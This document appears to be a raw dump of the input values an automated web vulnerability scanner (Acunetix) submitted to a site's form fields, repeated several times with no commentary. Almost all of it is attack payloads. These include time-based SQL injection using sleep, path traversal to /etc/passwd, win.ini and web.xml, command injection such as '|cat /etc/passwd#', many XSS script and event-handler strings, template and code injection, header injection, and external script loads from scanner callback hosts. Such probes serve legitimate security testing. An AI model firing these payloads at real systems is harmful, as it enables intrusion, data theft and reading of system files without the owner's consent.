acu9024<s1﹥s2ʺs3ʹuca9024

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

|cat /etc/passwd#

1

-1

1

acux8683z1z2abcxuca8683

${100110+99614}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'|'ld

-1)

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(961968)</ScRiPt>

1&n917038=v933750

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<script>prompt(905828)</script>

1

"|"ld

1

1

!(()&&!|*|*|

1<ScRiPt >prompt(956259)</ScRiPt>

nLw2NZXz'

testasp.vulnweb.com

WEB-INF/web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

22CfVvJ4')

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936822></ScRiPt>

^(#$!@#$)(()))******

1

1

WEB-INF\web.xml

.\./.\./.\./.\./.\./.\./etc/passwd

1<ScRiPt >prompt(980998)</ScRiPt>

1

LYl4TBIU'))

'

1

'"()

1

1

-1

1<video><source onerror="javascript:prompt(925060)">

1

/etc/passwd

1

1

"

1

1

-1)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903418)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1))

1

1

||cat /etc/passwd

1

1<div style=width:expression(prompt(971111))>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

4nTqfqqE'

1

FBT4fL6x')

1

1

acunetix_wvs_invalid_filename

'

1<iframe src='data:text/html

&dir

1

................etc/passwd

1

23fYcOo2'))

"

http://hitWCLTcmL7it.bxss.me/

comments

1

1<body onload=prompt(905480)>

'&dir&'

1

1

${@print(md5(acunetix_wvs_security_test))}

1

comments

1

"&dir&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929752)>

${@print(md5(acunetix_wvs_security_test))}\

1

file:///etc/passwd

1

comments/.

1

1

1

1<img src=xyz OnErRor=prompt(902527)>

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1<img/src=">" onerror=alert(969118)>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'|dir

http://www.acunetix.tst

1<ScRiPt%20>prompt(916692)</sCripT>

WEB-INF/web.xml

1

1

"|dir

1

1

1&lt

WEB-INF\web.xml

1

1

1

1

1

1

1

<img acu onmouseover=prompt(911481) //>

../../../../../../../../../../windows/win.ini

1

1

1

'"

1

1

1

1<input autofocus onfocus=prompt(991303)>

response.write(9281247*9606693)

1

1

1'"()&%<ScRiPt >prompt(983514)</ScRiPt>

<!--

../../../../../../../../../../boot.ini

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'+response.write(9281247*9606693)+'

1

&cat /etc/passwd&

'"()&%<ScRiPt >prompt(926481)</ScRiPt>

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini.jpg

1

"+response.write(9281247*9606693)+"

1

1

'&cat /etc/passwd&'

1_946594

1_BzztY <ScRiPt >prompt(996551)</ScRiPt>

1

1

1

1

windowswin.ini

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

${99156+99996}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

acu5208<s1﹥s2ʺs3ʹuca5208

if(now()=sysdate(),sleep(7.092),0)/*'XOR(if(now()=sysdate(),sleep(7.092),0))OR'"XOR(if(now()=sysdate(),sleep(7.092),0))OR"*/

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

|cat /etc/passwd#

1

acux6278z1z2abcxuca6278

(select(0)from(select(sleep(7.092)))v)/*'+(select(0)from(select(sleep(7.092)))v)+'"+(select(0)from(select(sleep(7.092)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n929898=v991877

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(913672)</ScRiPt>

)

-1

1

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1)

1<script>prompt(993104)</script>

"|"ld

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1))

1<ScRiPt >prompt(921119)</ScRiPt>

^(#$!@#$)(()))******

testasp.vulnweb.com

WEB-INF/web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1

bCYlSqHa'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964212></ScRiPt>

1

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

WEB-INF\web.xml

'

9NOJiVeX')

1<ScRiPt >prompt(993473)</ScRiPt>

1

1

1

1

1

/etc/passwd

1<video><source onerror="javascript:prompt(981081)">

"

1

1

tPCE27fQ'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933905)"></g></svg>

'

||cat /etc/passwd

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

1

1<div style=width:expression(prompt(963880))>

-1)

1

http://hitaYYlIXOK7p.bxss.me/

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<iframe src='data:text/html

-1))

${@print(md5(acunetix_wvs_security_test))}

1

................etc/passwd

'&dir&'

acunetix_wvs_invalid_filename

1

1

1

lSWi10tR'

1<body onload=prompt(972832)>

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

"&dir&"

1

nCw1k6aI')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(914926)>

1

comments

1

1

|dir

file:///etc/passwd

1

ncmEgedn'))

1<img src=xyz OnErRor=prompt(948937)>

http://www.acunetix.tst

comments/.

1

1

'|dir

1<img/src=">" onerror=alert(954043)>

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1<ScRiPt%20>prompt(983847)</sCripT>

'"

1

1

"|dir

1

1

1

WEB-INF/web.xml

1&lt

<!--

1

1

1

<img acu onmouseover=prompt(947106) //>

1'"()&%<ScRiPt >prompt(906895)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1

'"()&%<ScRiPt >prompt(970044)</ScRiPt>

response.write(9803288*9868374)

1<input autofocus onfocus=prompt(966949)>

1

../../../../../../../../../../windows/win.ini

1

1

1

'+response.write(9803288*9868374)+'

1

&cat /etc/passwd&

<a href='http://www.acunetix.com'>website security</a>

1_902831

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../boot.ini

"+response.write(9803288*9868374)+"

'&cat /etc/passwd&'

1

[url=http://www.acunetix.com]website security[/url]

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini.jpg

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1_3pWbX <ScRiPt >prompt(969976)</ScRiPt>

1

1

1

cat /etc/passwd

windowswin.ini

1

1

acu6192<s1﹥s2ʺs3ʹuca6192

1

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

................windowswin.ini

`cat /etc/passwd`

1

1

1

1

1

1

acux8642z1z2abcxuca8642

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

|cat /etc/passwd#

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

-1

1

1<ScRiPt >prompt(904230)</ScRiPt>

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99760+100450}

/.\./.\./.\./.\./.\./.\./windows/win.ini

'|'ld

-1)

1<script>prompt(907726)</script>

1

1

1

1

1

-1))

"|"ld

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(936410)</ScRiPt>

../../../../../../../../../../etc/passwd.jpg

)

1

1&n987200=v924048

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

nqOSH0C9'

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900272></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

!(()&&!|*|*|

1

1

1some_inexistent_file_with_long_name%00.jpg

MCJrDaj0')

1

1<ScRiPt >prompt(997986)</ScRiPt>

^(#$!@#$)(()))******

'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

CoAf2Czw'))

1

1

1<video><source onerror="javascript:prompt(946374)">

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"

-1

testasp.vulnweb.com

WEB-INF/web.xml

'"()

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(995812)"></g></svg>

1

-1)

WEB-INF\web.xml

||cat /etc/passwd

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1

1

1

1<div style=width:expression(prompt(932419))>

-1))

/etc/passwd

1

&dir

1

1

1

P43X3CCz'

1

1<iframe src='data:text/html

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'&dir&'

'

1

6NGsVzW2')

1<body onload=prompt(995521)>

1

1

1

1

"&dir&"

1

ElfJC0sO'))

http://hitGAxhvyneRL.bxss.me/

"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911451)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<img src=xyz OnErRor=prompt(929743)>

${@print(md5(acunetix_wvs_security_test))}

1

|dir

1

1

................etc/passwd

acunetix_wvs_invalid_filename

1<img/src=">" onerror=alert(914703)>

${@print(md5(acunetix_wvs_security_test))}\

1

1

'|dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1<ScRiPt%20>prompt(997347)</sCripT>

1

1

1

comments

"|dir

1

http://www.acunetix.tst

1

1&lt

1

file:///etc/passwd

1

comments/.

<img acu onmouseover=prompt(905193) //>

1

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1<input autofocus onfocus=prompt(911974)>

1'"()&%<ScRiPt >prompt(925498)</ScRiPt>

<!--

1

1

1

'"()&%<ScRiPt >prompt(963530)</ScRiPt>

1

1

WEB-INF/web.xml

1

<a href='http://www.acunetix.com'>website security</a>

1

response.write(9860615*9560780)

1

1

1

1_977039

1

[url=http://www.acunetix.com]website security[/url]

WEB-INF\web.xml

1

1

'+response.write(9860615*9560780)+'

&cat /etc/passwd&

1

1

1_jbjRL <ScRiPt >prompt(996932)</ScRiPt>

1

1

"+response.write(9860615*9560780)+"

../../../../../../../../../../windows/win.ini

1

1

1

1

'&cat /etc/passwd&'

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

../../../../../../../../../../boot.ini

acu1516<s1﹥s2ʺs3ʹuca1516

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4852z1z2abcxuca4852

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99107+99919}

windowswin.ini

1

1<ScRiPt >prompt(999434)</ScRiPt>

1

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

'|'ld

................windowswin.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<script>prompt(909437)</script>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n940186=v911151

1

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

..\..\..\..\..\..\..\..\windows\win.ini

1

-1

1

1<ScRiPt >prompt(993475)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/.\./.\./.\./.\./.\./.\./windows/win.ini

-1)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995265></ScRiPt>

!(()&&!|*|*|

1

testasp.vulnweb.com

1

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1))

'"()

1<ScRiPt >prompt(945787)</ScRiPt>

^(#$!@#$)(()))******

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(955904)">

XU02nsMG'

"

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951325)"></g></svg>

1

9wdtGF5N')

1

1

1

||cat /etc/passwd

1

1<div style=width:expression(prompt(924530))>

tckB43x1'))

1

WEB-INF/web.xml

1

/etc/passwd

&dir

1

-1

1<iframe src='data:text/html

1

'&dir&'

1

WEB-INF\web.xml

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

1<body onload=prompt(967768)>

"&dir&"

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

acunetix_wvs_invalid_filename

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979992)>

|dir

${@print(md5(acunetix_wvs_security_test))}

-1))

http://hit4yuMGShRK3.bxss.me/

1

1

................etc/passwd

1

comments

1<img src=xyz OnErRor=prompt(954055)>

1

'|dir

Yt04oqFq'

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

comments

1<img/src=">" onerror=alert(926384)>

ejUVFS86')

1

1

1

"|dir

1

1

1<ScRiPt%20>prompt(981208)</sCripT>

file:///etc/passwd

comments/.

aDwH4cLG'))

1

1

1

1

1&lt

/\../\../\../\../\../\../\../etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

<img acu onmouseover=prompt(985992) //>

1

http://www.acunetix.tst

1

WEB-INF/web.xml

1

1

1

1

1

1<input autofocus onfocus=prompt(959650)>

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(927116)</ScRiPt>

'"

1

1

response.write(9826675*9085277)

1

<a href='http://www.acunetix.com'>website security</a>

'"()&%<ScRiPt >prompt(936894)</ScRiPt>

<!--

../../../../../../../../../../windows/win.ini

1

1

1

1

1

'+response.write(9826675*9085277)+'

1_960363

[url=http://www.acunetix.com]website security[/url]

1

../../../../../../../../../../boot.ini

1

1

1

"+response.write(9826675*9085277)+"

1_DeTSr <ScRiPt >prompt(963428)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

&cat /etc/passwd&

1

1

1

windowswin.ini

1

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

acu6777<s1﹥s2ʺs3ʹuca6777

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

|cat /etc/passwd#

acux5852z1z2abcxuca5852

${99529+99318}

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(982822)</ScRiPt>

1

1

'|'ld

1

1

1<script>prompt(908618)</script>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1&n994989=v905732

.\./.\./.\./.\./.\./.\./etc/passwd

1

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

-1

1

1<ScRiPt >prompt(975727)</ScRiPt>

WEB-INF/web.xml

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/etc/passwd

-1)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?924143></ScRiPt>

WEB-INF\web.xml

testasp.vulnweb.com

1

1

'

)

-1))

1

1<ScRiPt >prompt(972960)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

!(()&&!|*|*|

"

1<video><source onerror="javascript:prompt(929956)">

1

LKKLOFiI'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

^(#$!@#$)(()))******

'"()

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977972)"></g></svg>

1

||cat /etc/passwd

rOxlIIF1')

1<div style=width:expression(prompt(908846))>

1

................etc/passwd

1

1

1

1

1

fRB5R0l5'))

1<iframe src='data:text/html

&dir

1

1

1

1

1

1

file:///etc/passwd

-1

1<body onload=prompt(994406)>

1

'&dir&'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

'

/\../\../\../\../\../\../\../etc/passwd

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979360)>

http://hitFlCS1o5WL5.bxss.me/

"&dir&"

"

1

1

-1))

1

1<img src=xyz OnErRor=prompt(945505)>

acunetix_wvs_invalid_filename

WEB-INF/web.xml

${@print(md5(acunetix_wvs_security_test))}

1

XkdxBUxg'

1

|dir

1

1<img/src=">" onerror=alert(910668)>

1

comments

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF\web.xml

XQ7sdhX3')

1

1

'|dir

1<ScRiPt%20>prompt(962191)</sCripT>

1

comments

1

QztzPxTX'))

1

http://www.acunetix.tst

1

1

"|dir

../../../../../../../../../../windows/win.ini

comments/.

'"

1&lt

1

1

1

../../../../../../../../../../boot.ini

1

1

1

<!--

1

<img acu onmouseover=prompt(930118) //>

1

1

1

1'"()&%<ScRiPt >prompt(944179)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<input autofocus onfocus=prompt(982679)>

response.write(9952173*9388070)

'"()&%<ScRiPt >prompt(978812)</ScRiPt>

windowswin.ini

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

'+response.write(9952173*9388070)+'

1_930462

&cat /etc/passwd&

1

1

................windowswin.ini

[url=http://www.acunetix.com]website security[/url]

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9952173*9388070)+"

1

1_8pIRY <ScRiPt >prompt(926837)</ScRiPt>

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

cat /etc/passwd

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1

../../../../../../../../../../etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

acu7384<s1﹥s2ʺs3ʹuca7384

|cat /etc/passwd#

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

${99306+99950}

acux1337z1z2abcxuca1337

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

'|'ld

1<ScRiPt >prompt(934095)</ScRiPt>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<script>prompt(992012)</script>

"|"ld

1some_inexistent_file_with_long_name%00.jpg

-1

1&n948891=v942362

WEB-INF/web.xml

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(974417)</ScRiPt>

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'

WEB-INF\web.xml

1

testasp.vulnweb.com

)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990044></ScRiPt>

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"

1

1

'"()

!(()&&!|*|*|

1<ScRiPt >prompt(921312)</ScRiPt>

mZ6DoKLQ'

1

1

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

||cat /etc/passwd

1

^(#$!@#$)(()))******

1<video><source onerror="javascript:prompt(974047)">

1

1

2DWu03QW')

1

1

&dir

/etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973116)"></g></svg>

1

1

MggfLZ78'))

1

1

1

1<div style=width:expression(prompt(992918))>

1

'

-1

'&dir&'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

-1)

1

1

1<iframe src='data:text/html

1

"&dir&"

1

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1

1

1<body onload=prompt(962792)>

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

http://hitnHcMF2p8uH.bxss.me/

hLr00u5K'

|dir

................etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981308)>

1

comments

1

1

jnbKKrFo')

1

1<img src=xyz OnErRor=prompt(997888)>

1

'|dir

1

1

comments

1<img/src=">" onerror=alert(955897)>

6pCVstFL'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

http://www.acunetix.tst

1<ScRiPt%20>prompt(943652)</sCripT>

1

comments/.

1

1

1

1

1&lt

/\../\../\../\../\../\../\../etc/passwd

'"

1

1

"|dir

1

<!--

1'"()&%<ScRiPt >prompt(937916)</ScRiPt>

1

1

<img acu onmouseover=prompt(985308) //>

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(982308)</ScRiPt>

1

1

1

1

1

1<input autofocus onfocus=prompt(950878)>

1

WEB-INF\web.xml

1

response.write(9241042*9360288)

1

1_928477

1

1

'+response.write(9241042*9360288)+'

1

1

<a href='http://www.acunetix.com'>website security</a>

&cat /etc/passwd&

1

"+response.write(9241042*9360288)+"

../../../../../../../../../../windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

[url=http://www.acunetix.com]website security[/url]

1

1

1_aq2me <ScRiPt >prompt(996869)</ScRiPt>

../../../../../../../../../../boot.ini

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

windowswin.ini

1

1

1

../../../../../../../../../../etc/passwd

1

1

acu1486<s1﹥s2ʺs3ʹuca1486

1

................windowswin.ini

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

acux6186z1z2abcxuca6186

1

1

1

1

|cat /etc/passwd#

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(958991)</ScRiPt>

1

1

${99040+99199}

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

'|'ld

1<script>prompt(996129)</script>

../../../../../../../../../../etc/passwd.jpg

/.\./.\./.\./.\./.\./.\./windows/win.ini

-1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"|"ld

1<ScRiPt >prompt(939353)</ScRiPt>

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n986921=v982605

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981611></ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

)

1<ScRiPt >prompt(946753)</ScRiPt>

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

1

c1HUq8vl'

1<video><source onerror="javascript:prompt(947652)">

!(()&&!|*|*|

1

1

WEB-INF/web.xml

.\./.\./.\./.\./.\./.\./etc/passwd

1

"

1

^(#$!@#$)(()))******

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989164)"></g></svg>

oVhC6Vj7')

WEB-INF\web.xml

1

||cat /etc/passwd

'"()

/etc/passwd

1

1

1

jG3G9ABe'))

1<div style=width:expression(prompt(959602))>

1

1

1

1

&dir

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1<iframe src='data:text/html

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'&dir&'

-1)

1<body onload=prompt(957461)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

................etc/passwd

-1))

'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996873)>

"&dir&"

acunetix_wvs_invalid_filename

http://hitpyg17yp5RI.bxss.me/

1

9pkkpdIq'

"

1

1

1<img src=xyz OnErRor=prompt(937300)>

comments

1

1

|dir

X6ZmrpBS')

${@print(md5(acunetix_wvs_security_test))}

1

comments

1<img/src=">" onerror=alert(924496)>

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1<ScRiPt%20>prompt(953417)</sCripT>

${@print(md5(acunetix_wvs_security_test))}\

comments/.

CGYnQnDv'))

'|dir

/\../\../\../\../\../\../\../etc/passwd

'"

1

1&lt

1

1

1

1

"|dir

1

<!--

WEB-INF/web.xml

<img acu onmouseover=prompt(964363) //>

1

1'"()&%<ScRiPt >prompt(984902)</ScRiPt>

1

1

1

1<input autofocus onfocus=prompt(956062)>

'"()&%<ScRiPt >prompt(953288)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1_971504

1

../../../../../../../../../../windows/win.ini

1

1

1

response.write(9446592*9806268)

[url=http://www.acunetix.com]website security[/url]

1

1

'+response.write(9446592*9806268)+'

